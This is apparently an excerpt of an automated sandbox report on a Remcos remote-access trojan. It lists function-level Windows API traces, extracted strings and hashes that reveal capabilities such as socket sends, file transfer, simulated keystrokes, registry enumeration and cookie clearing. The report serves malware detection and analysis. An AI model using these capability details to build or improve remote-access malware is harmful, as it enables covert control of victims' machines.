                                      • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                      • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                      • TranslateMessage.USER32(?), ref: 0041D4E9
                                      • DispatchMessageA.USER32(?), ref: 0041D4F3
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                      • String ID: Remcos
                                      • API String ID: 1970332568-165870891
                                      • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                      • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                      • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                      • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                                      • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                      • Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                                      • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • _memcmp.LIBVCRUNTIME ref: 00445423
                                      • _free.LIBCMT ref: 00445494
                                      • _free.LIBCMT ref: 004454AD
                                      • _free.LIBCMT ref: 004454DF
                                      • _free.LIBCMT ref: 004454E8
                                      • _free.LIBCMT ref: 004454F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorLast$_abort_memcmp
                                      • String ID: C
                                      • API String ID: 1679612858-1037565863
                                      • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                      • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                      • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                      • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: tcp$udp
                                      • API String ID: 0-3725065008
                                      • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                      • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                      • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                      • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411CFE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                      • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                      • GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                      • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                                        • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                                      • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                                      • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                                      • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                                        • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                        • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                      • String ID: t^F
                                      • API String ID: 3950776272-389975521
                                      • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                      • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                      • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                      • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 004018BE
                                      • ExitThread.KERNEL32 ref: 004018F6
                                      • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                      • String ID: PkG$XMG$NG$NG
                                      • API String ID: 1649129571-3151166067
                                      • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                      • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                      • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                      • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                        • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                        • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                      • String ID: .part
                                      • API String ID: 1303771098-3499674018
                                      • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                      • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                      • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                      • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                      • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InputSend
                                      • String ID:
                                      • API String ID: 3431551938-0
                                      • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                      • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                      • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                      • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __freea$__alloca_probe_16_free
                                      • String ID: a/p$am/pm$zD
                                      • API String ID: 2936374016-2723203690
                                      • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                      • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                      • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                      • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Enum$InfoQueryValue
                                      • String ID: [regsplt]$xUG$TG
                                      • API String ID: 3554306468-1165877943
                                      • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                      • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                      • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                      • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID: D[E$D[E
                                      • API String ID: 269201875-3695742444
                                      • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                      • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                      • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                      • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                        • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                        • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnumInfoOpenQuerysend
                                      • String ID: xUG$NG$NG$TG
                                      • API String ID: 3114080316-2811732169
                                      • Opcode ID: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                                      • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                      • Opcode Fuzzy Hash: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                                      • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045112C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                      • __alloca_probe_16.LIBCMT ref: 004511B1
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                      • __freea.LIBCMT ref: 0045121D
                                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                      • String ID: PkGNG
                                      • API String ID: 313313983-263838557
                                      • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                      • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                      • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                      • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                        • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                        • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                        • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                      • _wcslen.LIBCMT ref: 0041B763
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                      • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                      • API String ID: 37874593-122982132
                                      • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                      • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                      • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                      • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                        • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                        • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                      • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                      • API String ID: 1133728706-4073444585
                                      • Opcode ID: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                                      • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                      • Opcode Fuzzy Hash: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                                      • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                      • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                      • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                      • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                      • _free.LIBCMT ref: 00450F48
                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                      • _free.LIBCMT ref: 00450F53
                                      • _free.LIBCMT ref: 00450F5E
                                      • _free.LIBCMT ref: 00450FB2
                                      • _free.LIBCMT ref: 00450FBD
                                      • _free.LIBCMT ref: 00450FC8
                                      • _free.LIBCMT ref: 00450FD3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                      • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                      • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                      • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                      • int.LIBCPMT ref: 00411183
                                        • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                        • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                      • std::_Facet_Register.LIBCPMT ref: 004111C3
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                      • String ID: (mG
                                      • API String ID: 2536120697-4059303827
                                      • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                      • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                      • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                      • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                        • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                        • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                        • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                      • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue
                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      • API String ID: 1866151309-2070987746
                                      • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                      • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                      • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                      • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                      Uniqueness

